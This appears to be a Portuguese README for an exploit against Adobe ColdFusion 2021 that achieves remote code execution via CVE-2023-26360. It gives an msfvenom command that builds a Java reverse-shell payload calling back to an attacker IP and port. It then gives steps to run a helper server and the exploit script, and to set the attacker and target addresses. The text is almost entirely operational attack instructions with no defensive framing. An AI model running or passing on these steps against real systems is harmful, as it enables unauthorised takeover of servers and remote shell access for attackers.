
Exploit para Execução Remota de Código em ColdFusion 2021 (CVE-2023-26360)
Às vezes, os scripts não funcionam na primeira tentativa. Tente algumas vezes para funcionar
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java
server.pycve.2023-26360.py, portanto precisa ser iniciado primeiro.python3 server.py 8000
O argumento 8000 é a porta na qual o servidor irá escutar.
É importante notar que a linha 12 configura o endereço IP do servidor, então altere-o:
s.bind(('192.168.56.1',port))
cve-2023-26360.pypython3 cve-2023-26360.py 8000
Assim como em server.py, o argumento 8000 é a porta na qual o server.py irá escutar. Portanto, deve ser o mesmo em ambos os comandos.
A linha 8 do cve-2023-26360.py define o endereço IP do server.py que irá escutar. É necessário configurá-lo corretamente.
A linha 11 do cve-2023-26360.py define o endereço IP do servidor Coldfusion, então altere-o:
url = "http://192.168.56.102:8500"